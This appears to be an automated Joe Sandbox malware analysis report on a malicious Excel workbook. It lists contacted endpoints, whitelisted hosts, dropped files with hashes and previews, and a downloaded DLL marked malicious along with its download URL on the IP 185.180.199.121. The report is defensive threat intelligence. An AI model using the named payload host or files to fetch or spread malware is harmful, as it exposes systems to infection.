https://officesetup.getmicrosoftkey.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://ncus.contentsync.	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
http://weather.service.msn.com/data.aspx	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://apis.live.net/v5.0/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://management.azure.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://wus2.contentsync.	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
http://ocsp.sectigo.com0	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://insertmedia.bing.office.net/odc/insertmedia	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://api.office.net	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://incidents.diagnosticssdf.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://entitlement.diagnostics.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://outlook.office.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://templatelogging.office.com/client/log	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://outlook.office365.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://webshell.suite.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://management.azure.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://devnull.onenote.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://ncus.pagecontentsync.	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://messaging.office.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://augloop.office.com/v2	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://skyapi.live.net/Activity/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://dataservice.o365filtering.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.180.199.121	unknown	Netherlands		14576	HOSTING-SOLUTIONSUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432380
Start date:	10.06.2021
Start time:	08:46:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Order_Summary-9632850.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.expl.evad.winXLSB@5/10@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.4% (good quality ratio 3%) Quality average: 67.2% Quality standard deviation: 46.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 204.79.197.200, 13.107.21.200, 52.147.198.201, 52.109.88.177, 52.109.8.23, 52.109.76.35, 184.30.20.56, 13.107.5.88, 13.107.42.23, 2.20.142.209, 2.20.142.210, 40.126.31.5, 20.190.159.131, 40.126.31.7, 20.190.159.133, 20.190.159.137, 40.126.31.138, 40.126.31.136, 20.190.159.135, 20.82.210.154, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.75.105.140, 20.72.88.19 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net, au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, prod.configsvc1.live.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, l-0014.l-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information VT rate limit hit for: /opt/package/joesandbox/database/analysis/432380/sample/Order_Summary-9632850.xlsb

Simulations

Behavior and APIs

Time	Type	Description
08:48:06	API Interceptor	1x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.180.199.121	Total_order_data-V2434883.xlsb	Get hash	malicious	Browse	185.180.199.121/sat1_0609_2.dll
185.180.199.121	Delivery_Information_7038598.xlsb	Get hash	malicious	Browse	185.180.199.121/sat1_0609_2.dll

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTING-SOLUTIONSUS	Total_order_data-V2434883.xlsb	Get hash	malicious	Browse	185.180.199.121
	Delivery_Information_7038598.xlsb	Get hash	malicious	Browse	185.180.199.121
	W6DkFm55kO.exe	Get hash	malicious	Browse	162.248.225.14
	Lma2EzVvAK.exe	Get hash	malicious	Browse	185.180.198.250
	wEcncyxrEe	Get hash	malicious	Browse	104.193.252.114
	immed_paym_req_44191988.doc	Get hash	malicious	Browse	185.159.82.194
	zKOi8vCorq.exe	Get hash	malicious	Browse	185.180.198.99
	invoice_100221.doc	Get hash	malicious	Browse	185.180.198.135
	new shippment.xlsx	Get hash	malicious	Browse	185.180.198.135
	w3QgrgNAWs.exe	Get hash	malicious	Browse	185.180.198.99
	yWWZnMPf9D.exe	Get hash	malicious	Browse	185.180.198.99
	zLjBdL6Lbk.exe	Get hash	malicious	Browse	185.180.198.141
	DHL_file094883764773845.exe	Get hash	malicious	Browse	162.244.32.175
	https://bit.ly/3547mtO	Get hash	malicious	Browse	162.244.32.223
	http://436095.com/cwuobmjj/lnclqsrq.html?5crjx3rlwse.eps2k	Get hash	malicious	Browse	162.244.32.223
	https://bit.ly/2H1vYuP	Get hash	malicious	Browse	162.244.32.223
	https://bit.ly/33rThah	Get hash	malicious	Browse	162.244.32.223
	https://bit.ly/3l3ZAqg	Get hash	malicious	Browse	162.244.32.223
	http://275496.com/socsirmn/imokzmwd.html?2t2i2lh.4lur	Get hash	malicious	Browse	162.244.32.223
	yXkNVMiowl.docm	Get hash	malicious	Browse	185.159.82.237

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\kdldyeff.dll	Total_order_data-V2434883.xlsb	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll	Total_order_data-V2434883.xlsb	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B709A3E3-2143-4926-A150-50001F594891 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134922
Entropy (8bit):	5.3691068503705965
Encrypted:	false
SSDEEP:	1536:mcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:WEQ9DQW+ziXOe
MD5:	CE83A4FE75C04F9829A018CAC9873215
SHA1:	FF0231EC5EB1FE9DB253BDB3898D2A3B0F00DF64
SHA-256:	1853351F3FB3BAB351C2ECD5D0E5F2B07E9770B8E2E192E305656D02EBE8D38E
SHA-512:	E0C6830D7E68C718C2AF52AED48FB7D9DAF75AD4F1C695D0F0D79657A80D63086F29D149E6CEDD4F5E824834AA4F39BF654A5BF2A02AF1C31938AF2720CB729D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-10T06:47:11">.. Build: 16.0.14209.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\22BFE402.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	9924
Entropy (8bit):	7.973758306371751
Encrypted:	false
SSDEEP:	192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
MD5:	B34FB4F2F0F9E70B72BA3AFD028CD97C
SHA1:	C6868336F78DEA1E718965DF3341039581DB5B5A
SHA-256:	189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
SHA-512:	4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.\|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\32EACCC5.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6177
Entropy (8bit):	7.959095006853368
Encrypted:	false
SSDEEP:	96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
MD5:	C7ED6FC355D8632DB1464BE3D56BF5CC
SHA1:	615484A338922DDF00B903CFA48060AD60D70207
SHA-256:	26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
SHA-512:	FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......\|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[\|\.1..]v..A..G..y._3...3M.YG7.J.)..RK]u.j}.^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.\|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.\|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7CC9601B.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5744
Entropy (8bit):	7.966496386988271
Encrypted:	false
SSDEEP:	96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
MD5:	9AD30E24270C495AE68EAF3A1EEECBFB
SHA1:	8642D256E7FFBEF5804A2D2220A1FE475A99DC36
SHA-256:	6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
SHA-512:	EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX..feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.\|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n\|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....'Nx^....C..b...8........\|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8892F2D4.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	23989
Entropy (8bit):	7.989754044300238
Encrypted:	false
SSDEEP:	384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
MD5:	839795652A8FE78F26F4D86D757ABDE8
SHA1:	979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
SHA-256:	1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
SHA-512:	E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..\|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b...........\|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T.J)..+.KWt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\......hU\..W.m.I..\|.0\...o..?c.a3'.2}...u....`.9......q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.rv...U.0..._?.5\|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m\|...w_...1.i..bs.F..L.`.}..6V..w.....z

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F527A360.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	956
Entropy (8bit):	7.683552542542939
Encrypted:	false
SSDEEP:	24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
MD5:	32C83607A5C98C5A634278E5AED3AD61
SHA1:	EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
SHA-256:	4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
SHA-512:	AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.\|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]....@.-.L..G.....Q."..%fb.Z.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u\|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	525280
Entropy (8bit):	7.308601583725249
Encrypted:	false
SSDEEP:	6144:rCqCGToDHEHD7pPV25vyGOZYjbLvD6RVioO6gZ6xv4hCZWrVcXRYpmPBOA:uTGTGkn5gqufLvDcVzPR0kWA
MD5:	1E2385B6C669BA98831B97915F6ACEBA
SHA1:	A1966D5CEB273CC669C8D6829E2EC9E842D6E482
SHA-256:	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
SHA-512:	1780797924A0DD5D8E53C23CCFA2E5740BA2E58EC7E7BAEF3A362EACF7956B87D58AAF341DBF8F9F3B4B07853415404BB496DA039D448E43090478E07FFB3B00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: Total_order_data-V2434883.xlsb, Detection: malicious, Browse
IE Cache URL:	http://185.180.199.121/sat1_0609_2.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............A...A...A...A...A...A...A...A...A...AS..A...A...Ar..A...A"..A...Ar..A...Ar..A...ARich...A........................PE..L.....t`...........!.....@..................P............................... ......d...............................`...U............P...i...............#.......0...................................................P...............................text....7.......@.................. ..`.rdata.......P.......P..............@..@.data....c.......0..................@....rsrc....i...P...p..................@..@.reloc..._.......`..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0A910000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	80026
Entropy (8bit):	7.896011180732172
Encrypted:	false
SSDEEP:	1536:zZMVmEKjBX9U8fWGHzDmf5TOlMVGoIahaDHTU6hryF70KiiAeW9:empX9U8fW2XmfU2sTU2yF70Kii8
MD5:	78842651E96FCD7FF4034398CCB479C0
SHA1:	77D39B8E9585E5FC297F3F8F4A65A40E3C4FFC98
SHA-256:	11ECB4E0E7C2B139D3A4BF94DCAEC0212E686F5E3EC3832F2B33C0E5175D4749
SHA-512:	9D0999D504655A1428C164D201251C34E59E0E6EC6802616CF7B8493EDA968D31FD3291E6B6B4728B331B2C700C966042556224FFE327AE0F9E7E72DA87B8B1D
Malicious:	false
Preview:	.U.N.0.._....E...t.....$..\{.X.K.....[z..AT6y9.1g...jaM....w-;kF..'..k...]..U..S.x.-[.......2.V.v.>.p.9......p.2..D...A...F.\z...:e.6...L..T.....Ip...W.e..i...9..j..!B0Z.D..7....l.%(/_-.i0D..{.dM..&...R.(p.f...D.94.,...O)...y.k...Z....Q+..EL..RZ\|a......f?I..b....).7V..o....5...=J.....~ ..#..\I!>...jdS...P..!..X&.n.^...Zh..ii...w+.C.........\|.>.CE.-.........z.> .......).]."..4l..-.Q.art.!Om.j.6/...?.......PK..........!.........f.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Order_Summary-9632850.xlsb Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
